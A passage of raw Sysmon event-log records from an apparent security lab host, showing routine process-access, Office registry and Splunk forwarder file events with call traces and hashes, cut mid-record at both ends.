Shared\ClickToRun\AppVShNotify.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50924504C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBF8-607E-DC0D-00000000BB01}1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+3c7e3|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+3cc57|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+3bbb2|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+3d10b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+437b5|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+42a24|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+40c9c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+b6b3f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+e660|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+66405|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+67f11|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+67df9|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+66c69|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.404{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-DB0D-00000000BB01}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.404{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF8-607E-DB0D-00000000BB01}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.404{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-DA0D-00000000BB01}4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}50924504C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-EBF8-607E-DA0D-00000000BB01}4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVShNotify.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+3c7e3|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+3cc57|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+3bbb2|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+3d10b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+437b5|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+42a24|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+40c9c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+b6b3f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+e660|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+66405|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+67f11|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+67df9|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll+66c69|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.357{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF8-607E-D90D-00000000BB01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000076630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:58:00.357{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Clients\Mail\Microsoft Outlook\protocols\mailto\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -c IPM.Note /mailto "%%1" 10341000x800000000000000076629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.342{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-D90D-00000000BB01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.342{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF8-607E-D90D-00000000BB01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000076627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:58:00.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKLM\SOFTWARE\Clients\Mail\Microsoft Outlook\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /recycle 23542300x800000000000000076626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.311{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D26A29E594CF68BD42CACB360869952B,SHA256=818C3E2C887B0CA0549A0CD7A5A3F3965F22359695397CB16F6CD6B424FFEBC6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.264{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF8-607E-D80D-00000000BB01}6948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.248{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-D80D-00000000BB01}6948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.248{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF8-607E-D80D-00000000BB01}6948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.186{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C59CCDFCB2A20C4E1B1E3401695D038C,SHA256=BFC174AD1C63FE54DE6948DB458507E7B18162BA3967FBC4E47E793D71E854BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.139{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF8-607E-D70D-00000000BB01}6420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.123{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF8-607E-D70D-00000000BB01}6420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.123{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF8-607E-D70D-00000000BB01}6420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.107{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=660B968034BC595B9D8D10C531F7F46E,SHA256=0A177BAB423A5930A06A4853151087C6B0D16A66B04518AAF89CFA25CEB80535,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.076{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF8-607E-D60D-00000000BB01}5384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.061{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.061{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.998{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-D50D-00000000BB01}4120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.982{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.982{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 